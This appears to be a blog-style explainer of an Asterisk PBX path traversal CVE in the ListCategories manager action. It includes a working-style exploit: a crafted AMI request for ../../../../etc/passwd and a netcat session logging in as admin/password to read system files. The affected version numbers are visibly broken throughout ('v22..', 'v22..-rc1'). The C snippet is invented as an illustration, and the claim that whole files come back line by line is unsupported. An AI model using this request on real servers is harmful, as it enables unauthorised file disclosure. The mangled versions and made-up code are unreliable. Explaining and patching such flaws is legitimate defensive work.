CVE-2024-53566 - Path Traversal in Sangoma Asterisk action_listcategories() (v22 through v22..-pre1) Explained

Summary:
In June 2024, a vulnerability (CVE-2024-53566) was found in the popular Sangoma Asterisk PBX (private branch exchange) software, specifically in several v22 releases including v22.., v22..-rc1, v22..-rc2, and v22..-pre1. Exploiting a flaw in the action_listcategories() function allows a malicious remote user to perform path traversal attacks—which means reading or listing arbitrary files on the server, outside the expected configuration scope.

This explainer covers how this vulnerability works, the impact, and gives a simple demonstration with code. If you’re running Asterisk in production, you need to know about this CVE.

What is Path Traversal?

Path traversal is when an attacker manipulates file paths to access directories or files outside of the intended scope. By sending certain sequences like ../../../, you can climb up the server directory structure—sometimes all the way to critical files like /etc/passwd.

Where's the Problem?

The action_listcategories() function is used in the Asterisk Manager Interface (AMI) to list categories defined in configuration files. The function trusts user-supplied file paths, with little or no sanitization against path traversal.

Here's a simplified (illustrative) snippet based on the public reports and code context

//   vulnerable_asterisk.c : simplified illustration
void action_listcategories(AMI_CMD *cmd, char *filename) {
    // receives filename from user input via AMI
    FILE *f = fopen(filename, "r");
    if (f == NULL) {
        // error handling, but doesn't stop path traversal
        fprintf(stderr, "file open error\n");
        return;
    }
    // ... (read config categories, send back to user)
    fclose(f);
}

Notice there’s no check that filename is only a valid .conf configuration file.

What Does an Exploit Look Like?

An attacker sends a crafted request to the Asterisk AMI, asking to “list categories” for a file path like ../../../../etc/passwd. The Asterisk server will happily read and output contents of files outside its expected directories.

Request

Action: ListCategories
File: ../../../../etc/passwd

Response

Asterisk will return content categories—or, if "categories" are not found, the whole file, line by line.

Example using netcat (nc)

# Connect to the AMI port
nc asterisk-server 5038

# Type the following (simulate an AMI login if necessary)
Action: Login
Username: admin
Secret: password

Action: ListCategories
File: ../../../../etc/passwd

Look for sensitive info to come back!

Potential Impact

- Read system files (like /etc/passwd)

Reconnaissance for further attacks

Unless patched, any remote attacker with AMI access (even limited or guessed accounts) could potentially use this flaw.

Defensive Advice

Fix:
Upgrade to the fixed version of Asterisk as soon as the patch is released! (Check Asterisk Security Advisories and official project page).

CVE Details:

- CVE-2024-53566 at Mitre

Project:

- Asterisk Home
- Asterisk Security Advisories

Vendor Advisory:

- Asterisk CVE-2024-53566 Advisory

More about Path Traversal:

- OWASP - Path Traversal

Closing Thoughts

CVE-2024-53566 is a real reminder that even "simple" file parameters can open dangerous doors, especially in tools as critical as Asterisk PBX. If you use Sangoma Asterisk v22 or any of the vulnerable builds, do not delay: patch ASAP and tighten AMI security.

Timeline

Published on: 12/02/2024 18:15:11 UTC
Last modified on: 02/06/2025 02:15:10 UTC